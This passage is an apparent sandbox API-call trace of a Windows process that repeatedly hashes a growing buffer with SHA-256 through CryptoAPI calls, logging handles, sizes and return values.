hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.584] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x20, dwFlags=0x0) returned 1 [0119.584] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49990 [0119.584] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e49990, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e49990, pdwDataLen=0xce59c) returned 1 [0119.584] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.584] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.584] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.585] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.585] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x40, dwFlags=0x0) returned 1 [0119.585] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49c90 [0119.585] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e49c90, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e49c90, pdwDataLen=0xce59c) returned 1 [0119.585] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.585] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.585] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.586] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.586] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x60, dwFlags=0x0) returned 1 [0119.586] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49b10 [0119.586] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e49b10, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e49b10, pdwDataLen=0xce59c) returned 1 [0119.586] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.586] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.586] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.586] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.586] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x80, dwFlags=0x0) returned 1 [0119.586] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.586] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49cf0 [0119.586] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e49cf0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e49cf0, pdwDataLen=0xce59c) returned 1 [0119.586] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.586] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.586] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.587] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.587] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0119.587] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.587] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e48470 [0119.587] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e48470, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e48470, pdwDataLen=0xce59c) returned 1 [0119.587] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.587] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.587] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.588] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.588] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0119.588] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e483e0 [0119.588] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e483e0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e483e0, pdwDataLen=0xce59c) returned 1 [0119.588] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.588] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.588] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.588] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.588] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0119.588] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.588] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47f90 [0119.588] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e47f90, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e47f90, pdwDataLen=0xce59c) returned 1 [0119.588] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.588] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.589] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.589] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.589] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x100, dwFlags=0x0) returned 1 [0119.589] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.589] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e482c0 [0119.589] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e482c0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e482c0, pdwDataLen=0xce59c) returned 1 [0119.589] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.589] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.589] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.590] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.590] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x120, dwFlags=0x0) returned 1 [0119.590] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.590] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e48320 [0119.590] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e48320, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e48320, pdwDataLen=0xce59c) returned 1 [0119.590] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.590] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.590] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.591] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.591] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x140, dwFlags=0x0) returned 1 [0119.591] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47db0 [0119.591] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e47db0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e47db0, pdwDataLen=0xce59c) returned 1 [0119.591] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.591] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.591] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.591] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.591] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x160, dwFlags=0x0) returned 1 [0119.591] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47d50 [0119.591] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e47d50, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e47d50, pdwDataLen=0xce59c) returned 1 [0119.591] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.592] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.592] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.592] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.592] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x180, dwFlags=0x0) returned 1 [0119.592] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.592] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e48290 [0119.592] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e48290, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e48290, pdwDataLen=0xce59c) returned 1 [0119.592] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.592] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.592] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.593] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.593] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0119.593] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47de0 [0119.593] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e47de0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e47de0, pdwDataLen=0xce59c) returned 1 [0119.593] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.593] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.593] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.593] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.593] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0119.594] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e484a0 [0119.594] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e484a0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e484a0, pdwDataLen=0xce59c) returned 1 [0119.594] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.594] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.594] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.594] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.594] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0119.594] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e48080 [0119.594] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e48080, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e48080, pdwDataLen=0xce59c) returned 1 [0119.594] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.594] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.594] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.595] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.595] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x200, dwFlags=0x0) returned 1 [0119.595] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.595] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e48410 [0119.595] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e48410, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e48410, pdwDataLen=0xce59c) returned 1 [0119.595] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.595] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.595] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.596] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.596] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x220, dwFlags=0x0) returned 1 [0119.596] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.596] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e48440 [0119.596] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e48440, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e48440, pdwDataLen=0xce59c) returned 1 [0119.596] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.596] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.596] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.596] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.596] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x240, dwFlags=0x0) returned 1 [0119.596] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.596] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47ea0 [0119.596] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e47ea0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e47ea0, pdwDataLen=0xce59c) returned 1 [0119.596] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.596] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.597] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.597] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.597] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x260, dwFlags=0x0) returned 1 [0119.597] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.597] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47e40 [0119.597] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e47e40, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e47e40, pdwDataLen=0xce59c) returned 1 [0119.597] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.597] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.597] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.598] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.598] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x280, dwFlags=0x0) returned 1 [0119.598] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47e70 [0119.598] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e47e70, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e47e70, pdwDataLen=0xce59c) returned 1 [0119.598] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.598] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.598] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.598] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.598] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0119.598] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47f00 [0119.599] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e47f00, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e47f00, pdwDataLen=0xce59c) returned 1 [0119.599] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.599] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.599] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.599] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.599] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0119.599] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47f30 [0119.599] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e47f30, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e47f30, pdwDataLen=0xce59c) returned 1 [0119.599] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.599] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.599] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.600] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.600] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0119.600] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e48050 [0119.600] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e48050, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e48050, pdwDataLen=0xce59c) returned 1 [0119.600] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.600] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.600] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.601] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.601] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x300, dwFlags=0x0) returned 1 [0119.601] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.601] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e480b0 [0119.601] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e480b0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e480b0, pdwDataLen=0xce59c) returned 1 [0119.601] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.601] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.601] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.601] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.601] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x320, dwFlags=0x0) returned 1 [0119.601] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.601] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e480e0 [0119.601] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e480e0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e480e0, pdwDataLen=0xce59c) returned 1 [0119.601] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.602] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.602] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.602] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.602] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x340, dwFlags=0x0) returned 1 [0119.602] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e481a0 [0119.602] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e481a0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e481a0, pdwDataLen=0xce59c) returned 1 [0119.602] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.602] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 